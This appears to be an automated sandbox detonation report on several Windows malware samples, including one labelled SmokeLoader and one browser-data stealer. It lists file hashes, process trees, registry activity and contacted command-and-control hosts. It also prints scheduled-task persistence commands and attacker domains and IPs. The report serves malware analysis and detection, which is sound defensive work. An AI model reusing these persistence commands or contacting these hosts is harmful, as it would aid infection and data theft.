C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 50a8221b93fbd2628ac460dd408a9fc1
SHA1 7e99fe16a9b14079b6f0316c37cc473e1f83a7e6
SHA256 46e488628e5348c9c4dfcdeed5a91747eae3b3aa49ae1b94d37173b6609efa0e
SHA512 27dda53e7edcc1a12c61234e850fe73bf3923f5c3c19826b67f2faf9e0a14ba6658001a9d6a56a7036409feb9238dd452406e88e318919127b4a06c64dba86f0

memory/2976-98-0x0000000003940000-0x00000000039C5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

MD5 8b4526e895c34ab1c1796cec7b62d70a
SHA1 abcbbc7a5ea52c012e8800392643e3217e3ab65b
SHA256 23f14ebcf1cfeee3536f101c05a58f8fba82b4e6ec1134fd21310601161e7f05
SHA512 c3a8175e4d66fd468bdf841c339fc9b64b53899ee3f8fd8ae8052d8f0513669c260014e6e765584fed39b0a4c08ec802a7d143d0da9001ce397258289ea34b44

memory/2976-144-0x0000000003D30000-0x0000000003D9B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Windows\system32\GroupPolicy\Machine\Registry.pol

MD5 103efdadea8dc9131b76649cbba6bedf
SHA1 30d71efcf6b0935bde43f50f336d886a8a6b8585
SHA256 f7940488e3457006f40052a873db5f5d403d81b10d566a58a84eb95a5eb419ff
SHA512 f914fb73d4e2a469e54f9832b986738d12737d86687de41aae65add5fb3327a49d72653120c1d1f954d04981263259badf420cb017205c4f417bd4d07528675c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Program Files (x86)\oWxSecJNU\GasXUvu.xml

MD5 c1397451e68bacab3cca7b683f398b3f
SHA1 06ee63f2f417a3d9966ac21def544eccda77cb04
SHA256 6b22fdfc6b37d060af6aba9cb7274d8fb8bdeeeac28b79347da65102fc2a67c8
SHA512 7977c50d8b1c635a451bf17e3c4d0feb0bd071e4744d605551b8d05ab9263d078b2e489da477b492e01da8fd91373201b8e1be827916059127802eddcd764cc7

C:\Program Files (x86)\YNUWFfCEdUiU2\QzjBmRy.xml

MD5 9621d5f63b3fcd606b8ff8ed9157a499
SHA1 be38a8d0c15a57bd4ea82723b4e6b5bb12786522
SHA256 1a2fd71df36c5bb08dcc2df918637ce9a13d374ec31fa2c4f72edd01d36f132d
SHA512 f71284dd248c66c626fa53faf82f95fdeadc0beebb3cef10e3244e78867497d9047fc50150fe5ea227d874021dd96701d9b7b2f3deefce902f1ec0f2d986065e

C:\ProgramData\eiYaNjTCbhfbMeVB\ntStZTp.xml

MD5 c194392ec74b5091e38d188c83192fba
SHA1 a7bc3c027546416ee65c7938dc801d480b907eb2
SHA256 89610312d7550ae70433f60f8d511cc90e232c23d864c9c6d7d0ea1ad79ffe95
SHA512 1038baa18f2abaf3e4f269ae568a45ab9588f9ac1d98788a79e20d851758496d0202269061e8f34d26f3fac2a5218f6824b8d2ee5ec55d0815e3afaff043c47c

C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\fXwrAtP.xml

MD5 0d3059a296747a3296dbe86790856819
SHA1 73fd4f7df982dd0013446ed38a7b0109b06f6057
SHA256 01d4f6671f0e4baa591f71f8107b3be5c6f647af9b6adebf2a3267db5bdbcfc2
SHA512 5732f9a4b8a3fdb19675eb1ad69e6d1983d0f4d09446d1c8eb41ce2595812ffb329d3167048e33d095a9b61ad94e0ff9ee005ed399897da5d8f2b1e33d709805

C:\Program Files (x86)\LsajhStaXkJRC\ircnoIG.xml

MD5 9167aa8b19046bc9e9c1058476de0c98
SHA1 f582f0e980a48c2c50d9da9a876a11e04739b7fa
SHA256 0a895bd7d9671aeaa73e6caf8697443d3c7c62eb8886f01adf0f4e2f4d037250
SHA512 660b9fdc326b921b189e1518ef7d7e6039c0f66616230acfa4b4378ecdcb0632078b6fa688cbfe24cbab72399d639974588542f76244efaafbf233c61ba6271f

C:\Windows\Temp\biwNYXhGTKCQxjLv\LUUVSPHV\nDkOWwT.dll

MD5 617698f01c7cceb3b262a98ba4da5a98
SHA1 c9244abc65ab3c485cc197ddea5e846b65d14bad
SHA256 9c0b90664119447fee609a6a27f5d97affa2ae310bd9d1aa37e458c9819f1754
SHA512 3b713c0ff53a7f88f628a90b30d59417bf5b92216666e4bd2f4c1cd502f338a1838c9691d5ee2830015b5f697ca811ee8e976d026c0d073b1487fb573b50a400

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\lhmx4teg.default-release\prefs.js

MD5 4e5b122b0e5483952bd49aea2274ea05
SHA1 74e6c3921e10079604d52d534d26c00faa3c536c
SHA256 9857fb8807bcda54420e6b482908cb46f20569c2d32f7f28f67b78b60c48fdba
SHA512 c7855363b5edfbaf102f23d3682b2c9273d4db96ca505118ca93a91a1c84780d0f641eed69717532ec9a3b4643614e0a3aa5a7ea47501d83bfec436c98eb63a1

memory/2976-313-0x0000000004000000-0x0000000004073000-memory.dmp

memory/2976-323-0x0000000004A20000-0x0000000004ADD000-memory.dmp

memory/5060-345-0x0000000001580000-0x0000000002484000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 76.95.39.48:8080 tcp
US 76.95.39.48:8080 tcp

Files

C:\Users\Admin\AppData\Local\Temp\MYQXM.k

MD5 942afe4b6c981193fda8ede7a57fd5bb
SHA1 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6
SHA256 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88
SHA512 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955

memory/2408-4-0x0000000002340000-0x000000000250A000-memory.dmp

memory/2408-5-0x0000000002A10000-0x0000000002B3E000-memory.dmp

memory/2408-6-0x0000000002C70000-0x0000000002D99000-memory.dmp

memory/2408-7-0x0000000002340000-0x000000000250A000-memory.dmp

memory/2408-8-0x0000000002A10000-0x0000000002B3E000-memory.dmp

memory/2408-10-0x00000000004A0000-0x000000000055D000-memory.dmp

memory/2408-12-0x0000000001D80000-0x0000000001E29000-memory.dmp

memory/2408-14-0x0000000001D80000-0x0000000001E29000-memory.dmp

memory/2408-11-0x0000000001D80000-0x0000000001E29000-memory.dmp

memory/2408-16-0x0000000001D80000-0x0000000001E29000-memory.dmp

memory/2408-18-0x0000000004C90000-0x0000000004D32000-memory.dmp

memory/2408-19-0x0000000000210000-0x00000000002AC000-memory.dmp

memory/2408-17-0x0000000002DA0000-0x0000000004C8F000-memory.dmp

memory/2408-22-0x0000000000210000-0x00000000002AC000-memory.dmp

memory/2408-21-0x0000000000210000-0x00000000002AC000-memory.dmp

memory/2408-23-0x0000000000050000-0x0000000000051000-memory.dmp

memory/2408-26-0x0000000000060000-0x0000000000064000-memory.dmp

memory/2408-34-0x0000000002C70000-0x0000000002D99000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 380 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 380 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe
PID 380 wrote to memory of 1732 N/A C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup331.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\System32\regsvr32.exe" -s MYQXM.k

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 76.95.39.48:8080 tcp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\MYQXM.k

MD5 942afe4b6c981193fda8ede7a57fd5bb
SHA1 62e6bb30e5a02920a3bbb1dffa7bd90d699afcd6
SHA256 99128a36e75d6739f15b1c5e8b40b5afe57740e6bf3d573c8636b26f78b2fb88
SHA512 2089221b9d554e51b016415b7e07c65ee0d76b1d3136a9424a98212ca812cb8d263d716d79cc4addca40f2c67df25ad642dfa903b6a641afba219bd9fc797955

memory/1732-5-0x00000000022E0000-0x00000000024AA000-memory.dmp

memory/1732-6-0x0000000002A10000-0x0000000002B3E000-memory.dmp

memory/1732-7-0x0000000002C70000-0x0000000002D99000-memory.dmp

memory/1732-8-0x0000000002DA0000-0x0000000002E5D000-memory.dmp

memory/1732-9-0x0000000002E60000-0x0000000002F09000-memory.dmp

memory/1732-10-0x0000000002E60000-0x0000000002F09000-memory.dmp

memory/1732-12-0x0000000002E60000-0x0000000002F09000-memory.dmp

memory/1732-13-0x00000000022E0000-0x00000000024AA000-memory.dmp

memory/1732-14-0x0000000002A10000-0x0000000002B3E000-memory.dmp

memory/1732-15-0x0000000002C70000-0x0000000002D99000-memory.dmp

memory/1732-16-0x0000000002E60000-0x0000000002F09000-memory.dmp

memory/1732-17-0x0000000002F10000-0x0000000004DFF000-memory.dmp

memory/1732-18-0x0000000004E00000-0x0000000004EA2000-memory.dmp

memory/1732-19-0x0000000004EB0000-0x0000000004F4C000-memory.dmp

memory/1732-22-0x0000000004EB0000-0x0000000004F4C000-memory.dmp

memory/1732-21-0x0000000004EB0000-0x0000000004F4C000-memory.dmp

memory/1732-23-0x0000000000300000-0x0000000000301000-memory.dmp

memory/1732-25-0x0000000000310000-0x0000000000314000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 99.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 4.143.123.163.in-addr.arpa udp
US 8.8.8.8:53 251.129.182.107.in-addr.arpa udp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 12.143.123.163.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Galaxy.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\SETUP_~1.EXE

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp
US 8.8.8.8:53 www.filifilm.com.br udp

Files

memory/556-5-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

memory/556-6-0x0000000000980000-0x0000000000988000-memory.dmp

memory/556-7-0x0000000074D5E000-0x0000000074D5F000-memory.dmp

memory/556-8-0x0000000074D50000-0x0000000075500000-memory.dmp

memory/556-9-0x0000000074D50000-0x0000000075500000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20240729-en

Max time kernel

120s

Max time network

121s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.65:443 twitter.com tcp
US 104.244.42.65:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.77:443 yandex.ru tcp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 sso.passport.yandex.ru udp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 pastebin.com udp
US 172.67.19.24:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 157.240.214.35:443 www.facebook.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 35.214.240.157.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 aaa.apiaaaeg.com udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 aaa.apiaaaeg.com udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/5104-0-0x0000000140000000-0x000000014060D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

Signatures

SmokeLoader

trojan backdoor smokeloader

Smokeloader family

smokeloader

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\PL\6523.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\6523.exe

"C:\Users\Admin\AppData\Local\Temp\PL\6523.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1728 -ip 1728

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1728 -s 460

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

memory/1728-3-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1728-2-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1728-1-0x0000000000560000-0x0000000000660000-memory.dmp

memory/1728-4-0x0000000000400000-0x0000000000448000-memory.dmp

memory/1728-5-0x0000000000400000-0x0000000000409000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-10 05:02

Reported

2024-11-10 05:05

Platform

win7-20241010-en

Max time kernel

32s

Max time network

37s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2580 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2580 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe
PID 2580 wrote to memory of 2720 N/A C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe C:\Windows\system32\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe

"C:\Users\Admin\AppData\Local\Temp\PL\pb1115.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2580 -s 1084

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.facebook.com udp
GB 163.70.147.35:443 www.facebook.com tcp
US 8.8.8.8:53 aaa.apiaaaeg.com udp

Files

memory/2580-1-0x0000000140000000-0x000000014060D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Cab7FCC.tmp

